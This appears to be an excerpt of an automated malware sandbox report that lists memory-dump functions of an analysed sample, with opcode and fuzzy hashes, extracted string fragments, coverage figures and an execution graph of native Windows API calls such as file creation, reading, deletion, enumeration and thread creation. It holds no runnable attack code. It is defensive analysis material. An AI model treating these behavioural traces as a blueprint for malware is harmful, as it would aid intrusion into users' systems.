                                                            • String ID: 6$O$S$\$s
                                                            • API String ID: 0-3854637164
                                                            • Opcode ID: 34835148c52b18033714975159add09a59853d8c6d7b47ae1c7b6fab0ac377f4
                                                            • Instruction ID: c10baf41b4d9ead27eb473d9e8679baa34a0a29c7d75f6e947058e3ea84b1919
                                                            • Opcode Fuzzy Hash: 34835148c52b18033714975159add09a59853d8c6d7b47ae1c7b6fab0ac377f4
                                                            • Instruction Fuzzy Hash: 2D51A2B2901218AADB16DF94DC89FEFB379AB44314F004299ED086B141EB755B54CFA1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 9=
                                                            • API String ID: 0-389403476
                                                            • Opcode ID: 1ba39770b36bb2efd0079e1446335265e113c75a81ecf2ac7fbceb1315de4861
                                                            • Instruction ID: db68380f6f9f7dc4c2426d18729860014d5e5ad6392899ff7c9e4a4888d04297
                                                            • Opcode Fuzzy Hash: 1ba39770b36bb2efd0079e1446335265e113c75a81ecf2ac7fbceb1315de4861
                                                            • Instruction Fuzzy Hash: F311ECB6D0121CAF8B00DFA9DD409EEBBF9EF88210F14456AE919E7200E7705A45CFA1
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 243c135a4095cb6747dc3667deed954e439b7db5e3ad43846ca40462c780e62b
                                                            • Instruction ID: 314100d92ac271cb62816ae50734e109d6e55dbeec035af06233311b5f3023d3
                                                            • Opcode Fuzzy Hash: 243c135a4095cb6747dc3667deed954e439b7db5e3ad43846ca40462c780e62b
                                                            • Instruction Fuzzy Hash: 7E11C6B23C03057BF7219A558C42FAB739D9BC4B20F244005FF04AE1C1EBA5B8114AB8
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a8b047226e4cf2ee44a1ab719abde226497fa320677b12104342e7a5d5407d83
                                                            • Instruction ID: a42fb43bc4e4498de4c4537d92167170f62381535b2102892accc3b457efc3db
                                                            • Opcode Fuzzy Hash: a8b047226e4cf2ee44a1ab719abde226497fa320677b12104342e7a5d5407d83
                                                            • Instruction Fuzzy Hash: 5521D3B6D0121DAF8B00DF99D9419EFB7F9EF48210F14456AE919E7200E7705A458FE1
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2ce462a3ec75bf52468d33be574df14a618b7a36356d41f72aac975e0b870155
                                                            • Instruction ID: adb18de0c5e01cfe26fd0a8caced5776d84872303cda6c8ae264f52d279ec476
                                                            • Opcode Fuzzy Hash: 2ce462a3ec75bf52468d33be574df14a618b7a36356d41f72aac975e0b870155
                                                            • Instruction Fuzzy Hash: 0311D071540259ABD721EBA8CC05FEFB3ADEFC9700F004109FD099B284DB7069158BA1
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1662f6d820b573e8cf825ced8c2dfc1149c67ff21fd4f63b6d7b1b91a47811d0
                                                            • Instruction ID: d5069c2e730a764fe8756cfca7c1897b94866d44bdff5758a388073696447f70
                                                            • Opcode Fuzzy Hash: 1662f6d820b573e8cf825ced8c2dfc1149c67ff21fd4f63b6d7b1b91a47811d0
                                                            • Instruction Fuzzy Hash: 74119071540249ABD721EFA8CC49FEFB3A9EF89700F104509FD09AB284DB71A905CBA5
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 016bd8ce1746197e8720e3a876af95e62b55fcc460ffb57a2bf48c7dd99eb0d8
                                                            • Instruction ID: a2124a1cae0bc9556c9e95664bc6ed4d1b61da8b4f64b8fce659a8e175f4aded
                                                            • Opcode Fuzzy Hash: 016bd8ce1746197e8720e3a876af95e62b55fcc460ffb57a2bf48c7dd99eb0d8
                                                            • Instruction Fuzzy Hash: 860180B2204148BBCB54DE99DD95EEB77AEAF8C714F408609FA09E3240D630F8518BA4
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ea9f83b476703569a497567ae94f9b55c767c8ae5c7d8084d9c0c4b31f86b8b3
                                                            • Instruction ID: e59c6cb358751f9c7944aa503f36018b965ae2d8dd336a51491a04ea785a87a2
                                                            • Opcode Fuzzy Hash: ea9f83b476703569a497567ae94f9b55c767c8ae5c7d8084d9c0c4b31f86b8b3
                                                            • Instruction Fuzzy Hash: 9001D7B2D01228AF8B41DFE8D9459EFBBF9AB58200F14456EE819F3240F7705A448FA1
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c88a105afdb57d754c3ccbf7dc919d1d2fb40ef74bf4e6a6c2ce3675636679be
                                                            • Instruction ID: e750323695cc1a7cd4063ff1ca758aee2def3087c363355d17e19d7ec16d46c7
                                                            • Opcode Fuzzy Hash: c88a105afdb57d754c3ccbf7dc919d1d2fb40ef74bf4e6a6c2ce3675636679be
                                                            • Instruction Fuzzy Hash: 03F0B4736101126BD7204E7DAC81FD6B79CFBC4324F250622F918D7642E731D85587A0
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0beca4c5030d87ac569e1118754566c271f2f3493c482814f00c1c50a5af95f8
                                                            • Instruction ID: f9dcb4e156b45747df324fb76007be9f7eea900770873542a0ee6df9e4d2f454
                                                            • Opcode Fuzzy Hash: 0beca4c5030d87ac569e1118754566c271f2f3493c482814f00c1c50a5af95f8
                                                            • Instruction Fuzzy Hash: A3F01C76204209BBDB10EF99DC85EAB77ADEFC9710F008509FE1897240D670B9118BB4
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a7a89bf0b7ff1966d1fd272edeaf3f836e071a560e24df1aff220d124b7741e0
                                                            • Instruction ID: 6a51feb8d3fca4041761b22980974d283d4af2e863552a0b04f7d8246946de47
                                                            • Opcode Fuzzy Hash: a7a89bf0b7ff1966d1fd272edeaf3f836e071a560e24df1aff220d124b7741e0
                                                            • Instruction Fuzzy Hash: 5DF01271815209EBDB14DFA4D841BDEBBB9EB04720F2047A9E8259B280D73597548B85
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 55414cb2eea5425d9ef389f5a0183cee491df25370640f6f28825660923570ad
                                                            • Instruction ID: 3c78ea3629676d8284995663e973974d8662f05925b503ee3ddb7967a2d15fb4
                                                            • Opcode Fuzzy Hash: 55414cb2eea5425d9ef389f5a0183cee491df25370640f6f28825660923570ad
                                                            • Instruction Fuzzy Hash: A1E04632204218BBE621EA59DC05F9BB7AEDBC5714F004419FA0CA7241C670B9118AF0
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0551978a0c2b290154f59d25f12fe7dab407836f126f1f808668b8db29d4e9fc
                                                            • Instruction ID: 0351c8e2a4f728c7b440021fc6f7a24eecf56145ba1298e183c00db5773f809a
                                                            • Opcode Fuzzy Hash: 0551978a0c2b290154f59d25f12fe7dab407836f126f1f808668b8db29d4e9fc
                                                            • Instruction Fuzzy Hash: 64A00299648072A51B9731511F4447B3843D6475307E525606E93DF18BD6808C766442
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                            • API String ID: 0-3248090998
                                                            • Opcode ID: d0e7571c0df165a9a4b5ed54add29b8d5dc776181788390e167ec6a48bc86d42
                                                            • Instruction ID: f8c6060e8b0d2cb74116733b9d26fd8c604235c8efd7cba2376e98f0bc0ce00e
                                                            • Opcode Fuzzy Hash: d0e7571c0df165a9a4b5ed54add29b8d5dc776181788390e167ec6a48bc86d42
                                                            • Instruction Fuzzy Hash: 2F91FFF08052A98ACB118F55A5603DFBF71BB95304F1581E9C6AA7B243C3BE4E85DF90
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: /$#2$+$0$4$:c$BL$C$Gj$I$Y$^$`+$f$i$i>$m$t$yv$zv$}
                                                            • API String ID: 0-617331232
                                                            • Opcode ID: 526664946cdf59d367deba820a059e4dfaf3dc6f844c3bf390b17ef636321425
                                                            • Instruction ID: 857305bdbfba02b2b77cb64ab6911985683543eff4f3b9207ee1974e74e692a2
                                                            • Opcode Fuzzy Hash: 526664946cdf59d367deba820a059e4dfaf3dc6f844c3bf390b17ef636321425
                                                            • Instruction Fuzzy Hash: 0A9127B0D05669CBEB60CF85D9987DEBBB1BB45308F1081C9C15D3B281C7BA1A89CF95
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: /$#2$+$0$4$:c$BL$C$Gj$I$Y$^$`+$f$i$i>$m$t$yv$zv$}
                                                            • API String ID: 0-617331232
                                                            • Opcode ID: 0d9fe08b0a411d4c11d88abc8bc2aab57cf2c48dea716e23f1fa3925386cc167
                                                            • Instruction ID: c56ed6d128341977da22fbb7e4de3c8093e3a2fefc4c3666642afc1f7d5c385f
                                                            • Opcode Fuzzy Hash: 0d9fe08b0a411d4c11d88abc8bc2aab57cf2c48dea716e23f1fa3925386cc167
                                                            • Instruction Fuzzy Hash: 9A9117B0D05669CBEB64CF85D9987DEBBB1BB05308F1081C9C1593B281C7BA1A89CF95
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                            • API String ID: 0-685823316
                                                            • Opcode ID: b9a0281c628507633b51722d22e164fd841d120133abac6fcf16d45ab3862f2d
                                                            • Instruction ID: 641f15a258ad08f4906c086f353f74315cc3a1cec15dbdb6f52b40c2777c1127
                                                            • Opcode Fuzzy Hash: b9a0281c628507633b51722d22e164fd841d120133abac6fcf16d45ab3862f2d
                                                            • Instruction Fuzzy Hash: CC31A7B1D4121CAAEF54DFE0CC44FEE7BB9AF08704F10815CE618BA180DBB556488FA5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: &$0$1$?$F$V$i
                                                            • API String ID: 0-3123711973
                                                            • Opcode ID: 2eb6d39b897ff1a2d41656db76857acd2c04c31815ff3af14003de6acb85ec0b
                                                            • Instruction ID: 0a3c46dda3fd4549a5f2982e0afad759a7b08d4b28b29526956e85964bae277e
                                                            • Opcode Fuzzy Hash: 2eb6d39b897ff1a2d41656db76857acd2c04c31815ff3af14003de6acb85ec0b
                                                            • Instruction Fuzzy Hash: CA11CC20D087CAD9DB22C6FC88482AEBF751B23224F4883D9D4F12A2D6D2754216C7A2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 0$4$A$n
                                                            • API String ID: 0-4168700205
                                                            • Opcode ID: 43c2a79bb2f97b0da33c2fc4388ccab3bed301d9738bc99c6ccfbcac214dfcde
                                                            • Instruction ID: 5cabc14f5c5189d270ec6c6caca6d148c21a8d0680101e573285a952e76a4ec7
                                                            • Opcode Fuzzy Hash: 43c2a79bb2f97b0da33c2fc4388ccab3bed301d9738bc99c6ccfbcac214dfcde
                                                            • Instruction Fuzzy Hash: FC314371D51109BBEF15DBA4CC45BEF73B9EF48304F004199E904A6240EB769B048BE5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 1$C$VKXA$W]PE
                                                            • API String ID: 0-3703782850
                                                            • Opcode ID: 6fed6f7b6c3b83d7620e039cd20e98104286a84af2124d77ed301d29971b9906
                                                            • Instruction ID: d58e0f2209c53f9ba1005152b040a4828c81e9988891f7d0d212ca3302f99b9f
                                                            • Opcode Fuzzy Hash: 6fed6f7b6c3b83d7620e039cd20e98104286a84af2124d77ed301d29971b9906
                                                            • Instruction Fuzzy Hash: 20F0A77090020C67CF00EFA8C9046EEBB79EB40300F2084A8DC1967202E7359704CB97

                                                            Execution Graph

                                                            Execution Coverage:2.7%
                                                            Dynamic/Decrypted Code Coverage:4%
                                                            Signature Coverage:2.1%
                                                            Total number of Nodes:477
                                                            Total number of Limit Nodes:77
95267 518950 LdrInitializeThunk 95266->95267 95268 502226 95267->95268 95271 519390 95268->95271 95270 50223b 95272 51941f 95271->95272 95273 5193bb 95271->95273 95276 2e02e80 LdrInitializeThunk 95272->95276 95273->95270 95274 519450 95274->95270 95276->95274 95277 519170 95278 519214 95277->95278 95280 519198 95277->95280 95279 51922a NtReadFile 95278->95279 95281 515770 95282 5157d2 95281->95282 95284 5157df 95282->95284 95285 5072c0 95282->95285 95286 5072ab 95285->95286 95287 50732c 95286->95287 95288 50b190 9 API calls 95286->95288 95289 5072b2 95288->95289 95289->95284 95646 5116b0 95647 5116cc 95646->95647 95648 5116f4 95647->95648 95649 511708 95647->95649 95651 519300 NtClose 95648->95651 95650 519300 NtClose 95649->95650 95653 511711 95650->95653 95652 5116fd 95651->95652 95656 51b530 RtlAllocateHeap 95653->95656 95655 51171c 95656->95655 95657 508734 95658 508744 95657->95658 95659 5086f4 95658->95659 95661 506fe0 95658->95661 95662 506ff6 95661->95662 95664 50702f 95661->95664 95662->95664 95665 506e50 LdrLoadDll 95662->95665 95664->95659 95665->95664 95666 4f9ca0 95667 4f9caf 95666->95667 95668 4f9cf0 95667->95668 95669 4f9cdd CreateThread 95667->95669 95290 50ac60 95295 50a970 95290->95295 95292 50ac6d 95311 50a5f0 95292->95311 95294 50ac89 95296 50a995 95295->95296 95323 508280 95296->95323 95299 50aae3 95299->95292 95301 50aafa 95301->95292 95302 514de0 GetFileAttributesW 95303 50aaf1 95302->95303 95303->95301 95303->95302 95306 50abe7 95303->95306 95342 50a040 95303->95342 95305 514de0 GetFileAttributesW 95305->95306 95306->95305 95308 50ac4a 95306->95308 95351 50a3b0 95306->95351 95309 51b410 RtlFreeHeap 95308->95309 95310 50ac51 95309->95310 95310->95292 95312 50a606 95311->95312 95315 50a611 95311->95315 95313 51b4f0 RtlAllocateHeap 95312->95313 95313->95315 95314 50a632 95314->95294 95315->95314 95316 508280 GetFileAttributesW 95315->95316 95317 50a942 95315->95317 95320 514de0 GetFileAttributesW 95315->95320 95321 50a040 RtlFreeHeap 
95315->95321 95322 50a3b0 RtlFreeHeap 95315->95322 95316->95315 95318 51b410 RtlFreeHeap 95317->95318 95319 50a95b 95317->95319 95318->95319 95319->95294 95320->95315 95321->95315 95322->95315 95324 5082a1 95323->95324 95325 5082a8 GetFileAttributesW 95324->95325 95326 5082b3 95324->95326 95325->95326 95326->95299 95327 5132e0 95326->95327 95328 5132ee 95327->95328 95329 5132f5 95327->95329 95328->95303 95330 504460 LdrLoadDll 95329->95330 95331 51332a 95330->95331 95332 513339 95331->95332 95355 512da0 LdrLoadDll 95331->95355 95334 51b4f0 RtlAllocateHeap 95332->95334 95338 5134e7 95332->95338 95335 513352 95334->95335 95336 5134dd 95335->95336 95335->95338 95339 51336e 95335->95339 95337 51b410 RtlFreeHeap 95336->95337 95336->95338 95337->95338 95338->95303 95339->95338 95340 51b410 RtlFreeHeap 95339->95340 95341 5134d1 95340->95341 95341->95303 95343 50a066 95342->95343 95356 50da70 95343->95356 95345 50a0d8 95347 50a0f6 95345->95347 95348 50a260 95345->95348 95346 50a245 95346->95303 95347->95346 95361 509f00 95347->95361 95348->95346 95349 509f00 RtlFreeHeap 95348->95349 95349->95348 95352 50a3d6 95351->95352 95353 50da70 RtlFreeHeap 95352->95353 95354 50a45d 95353->95354 95354->95306 95355->95332 95357 50da82 95356->95357 95358 50daa1 95357->95358 95359 51b410 RtlFreeHeap 95357->95359 95358->95345 95360 50dae4 95359->95360 95360->95345 95362 509f1d 95361->95362 95365 50db00 95362->95365 95364 50a023 95364->95347 95366 50db24 95365->95366 95367 50dbce 95366->95367 95368 51b410 RtlFreeHeap 95366->95368 95367->95364 95368->95367 95369 2e02ad0 LdrInitializeThunk 95370 507060 95371 50707c 95370->95371 95372 5070cf 95370->95372 95371->95372 95373 519300 NtClose 95371->95373 95374 507207 95372->95374 95381 506480 NtClose LdrInitializeThunk LdrInitializeThunk 95372->95381 95375 507097 95373->95375 95380 506480 NtClose LdrInitializeThunk LdrInitializeThunk 95375->95380 95378 5071e1 95378->95374 95382 506650 NtClose LdrInitializeThunk LdrInitializeThunk 95378->95382 
95380->95372 95381->95378 95382->95374 95383 505ae0 95384 508010 LdrInitializeThunk 95383->95384 95385 505b10 95383->95385 95384->95385 95387 505b3c 95385->95387 95388 507f90 95385->95388 95389 507fd4 95388->95389 95390 507ff5 95389->95390 95395 518620 95389->95395 95390->95385 95392 507fe5 95393 508001 95392->95393 95394 519300 NtClose 95392->95394 95393->95385 95394->95390 95396 51869d 95395->95396 95398 51864c 95395->95398 95400 2e04650 LdrInitializeThunk 95396->95400 95397 5186c2 95397->95392 95398->95392 95400->95397 95401 50f760 95402 50f7c4 95401->95402 95430 5061f0 95402->95430 95404 50f8fe 95405 50f8f7 95405->95404 95437 506300 95405->95437 95407 50faa3 95408 50f97a 95408->95407 95409 50fab2 95408->95409 95441 50f540 95408->95441 95410 519300 NtClose 95409->95410 95412 50fabc 95410->95412 95413 50f9b6 95413->95409 95414 50f9c1 95413->95414 95415 51b4f0 RtlAllocateHeap 95414->95415 95416 50f9ea 95415->95416 95417 50f9f3 95416->95417 95418 50fa09 95416->95418 95419 519300 NtClose 95417->95419 95450 50f430 CoInitialize 95418->95450 95421 50f9fd 95419->95421 95422 50fa17 95453 518dd0 95422->95453 95424 50fa92 95425 519300 NtClose 95424->95425 95426 50fa9c 95425->95426 95427 51b410 RtlFreeHeap 95426->95427 95427->95407 95428 50fa35 95428->95424 95429 518dd0 LdrInitializeThunk 95428->95429 95429->95428 95431 506223 95430->95431 95432 506247 95431->95432 95457 518e70 95431->95457 95432->95405 95434 519300 NtClose 95436 5062ea 95434->95436 95435 50626a 95435->95432 95435->95434 95436->95405 95438 506325 95437->95438 95462 518c60 95438->95462 95442 50f55c 95441->95442 95443 504460 LdrLoadDll 95442->95443 95445 50f57a 95443->95445 95444 50f583 95444->95413 95445->95444 95446 504460 LdrLoadDll 95445->95446 95447 50f64e 95446->95447 95448 504460 LdrLoadDll 95447->95448 95449 50f6ab 95447->95449 95448->95449 95449->95413 95452 50f495 95450->95452 95451 50f52b CoUninitialize 95451->95422 95452->95451 95454 518dea 95453->95454 95467 2e02ba0 LdrInitializeThunk 
95454->95467 95455 518e1a 95455->95428 95458 518e8d 95457->95458 95461 2e02ca0 LdrInitializeThunk 95458->95461 95459 518eb9 95459->95435 95461->95459 95463 518c7a 95462->95463 95466 2e02c60 LdrInitializeThunk 95463->95466 95464 506399 95464->95408 95466->95464 95467->95455 95468 510060 95469 51007d 95468->95469 95470 504460 LdrLoadDll 95469->95470 95471 51009b 95470->95471 95472 519260 95473 5192d4 95472->95473 95475 519288 95472->95475 95474 5192ea NtDeleteFile 95473->95474 95476 503063 95481 507c90 95476->95481 95479 50308f 95480 519300 NtClose 95480->95479 95482 507c9a 95481->95482 95486 503073 95482->95486 95487 5189f0 95482->95487 95485 519300 NtClose 95485->95486 95486->95479 95486->95480 95488 518a0d 95487->95488 95491 2e035c0 LdrInitializeThunk 95488->95491 95489 507d7a 95489->95485 95491->95489 95675 5026a7 95676 5026e8 95675->95676 95677 5061f0 2 API calls 95676->95677 95678 5026f3 95677->95678 95492 50226e 95493 502224 95492->95493 95494 50223b 95493->95494 95495 519390 LdrInitializeThunk 95493->95495 95495->95494 95679 4fb4b0 95680 51b380 NtAllocateVirtualMemory 95679->95680 95681 4fcb21 95680->95681 95682 509b2f 95683 509b46 95682->95683 95684 509b4b 95682->95684 95685 51b410 RtlFreeHeap 95684->95685 95686 509b7d 95684->95686 95685->95686

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 2$):$+x$1`$<8$>$BL$Fv$L$R<$[$g$l$lv$u7$}$5
                                                            • API String ID: 0-2604029153
                                                            • Opcode ID: f6807ac356e188390788d846bc9781ce0a6ceb2389fc75930f836422dc4f57d8
                                                            • Instruction ID: c8e5b6b8c0c42b42009173209fc1370a1d9af6fb5bb402caa4062da76de9e5bf
                                                            • Opcode Fuzzy Hash: f6807ac356e188390788d846bc9781ce0a6ceb2389fc75930f836422dc4f57d8
                                                            • Instruction Fuzzy Hash: 9902A0B090526DCBEB24CF85C9547ADBBB1BB44308F1081DAC60D7B280C7B95A99DF56
                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(?,00000000), ref: 0050C5E4
                                                            • FindNextFileW.KERNELBASE(?,00000010), ref: 0050C61F
                                                            • FindClose.KERNELBASE(?), ref: 0050C62A
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNext
                                                            • String ID:
                                                            • API String ID: 3541575487-0
                                                            • Opcode ID: 86011c127d856a0f2cf1489457390f07b8c344b9b3ec3ab41ca31718808f41b2
                                                            • Instruction ID: 5a244e49a58848cad58248b3b90f5e1ac4e7be9094748249aed30a966cad7a2c
                                                            • Opcode Fuzzy Hash: 86011c127d856a0f2cf1489457390f07b8c344b9b3ec3ab41ca31718808f41b2
                                                            • Instruction Fuzzy Hash: F831C87190030DBBEB20DB64CC85FFF7B7CAF84705F144558BA09A7181D675AA85CBA4
                                                            APIs
                                                            • NtCreateFile.NTDLL(?,?,?,?,?,?,FC8E4B7A,?,?,?,?), ref: 005190FE
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 6c116602c3ce2a7586dbde19a51ad50e29691ae579f357658d5e73b24c415cbe
                                                            • Instruction ID: f84ab82aa20cc25b652f6023ca49830b330a2ecd42b35590844f58c821b30bea
                                                            • Opcode Fuzzy Hash: 6c116602c3ce2a7586dbde19a51ad50e29691ae579f357658d5e73b24c415cbe
                                                            • Instruction Fuzzy Hash: 0031E3B5A01209AFDB14DF98D881EEEB7F9EF8C304F108219F919A7344D774A841CBA5
                                                            APIs
                                                            • NtReadFile.NTDLL(?,?,?,?,?,?,FC8E4B7A,?,?), ref: 00519253
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: 2825084812d6e97e4a90768c6b76eb88233662d4728ecb26d01c52c31c1abc37
                                                            • Instruction ID: d3340376f8d13235834fffcfe68e582c6d99eb6b708471cf7e7e4b4d46f822f7
                                                            • Opcode Fuzzy Hash: 2825084812d6e97e4a90768c6b76eb88233662d4728ecb26d01c52c31c1abc37
